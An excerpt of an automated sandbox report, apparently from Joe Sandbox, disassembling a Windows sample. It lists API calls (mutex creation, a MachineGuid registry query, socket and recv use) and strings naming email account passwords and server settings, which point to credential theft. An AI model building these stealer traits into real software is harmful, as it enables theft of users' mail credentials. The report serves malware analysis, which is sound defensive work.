10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                                                          Control-flow Graph

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                          • GetLastError.KERNEL32 ref: 0041399E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$CreateLastModeMutex
                                                          • String ID:
                                                          • API String ID: 3448925889-0
                                                          • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                          • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                            • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocOpenProcessQueryValue
                                                          • String ID:
                                                          • API String ID: 3676486918-0
                                                          • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                          • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 82 404df3-404e16 WSAStartup
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
                                                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                                                          APIs
                                                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                          • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                          • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                                          • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                          • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                                                          APIs
                                                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                          • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 0040438F
                                                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                          • VariantInit.OLEAUT32(?), ref: 004043C4
                                                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                          • VariantInit.OLEAUT32(?), ref: 00404414
                                                          • SysAllocString.OLEAUT32(?), ref: 00404419
                                                          • VariantInit.OLEAUT32(?), ref: 00404431
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                          • String ID:
                                                          • API String ID: 1312198159-0
                                                          • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                          • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                          • API String ID: 0-2111798378
                                                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                          • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                          APIs
                                                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wmemset$ErrorLast
                                                          • String ID: IDA$IDA
                                                          • API String ID: 887189805-2020647798
                                                          • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                          • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                          • socket.WS2_32(?,?,?), ref: 00404E7A
                                                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: freeaddrinfogetaddrinfosocket
                                                          • String ID:
                                                          • API String ID: 2479546573-0
                                                          • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                          • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98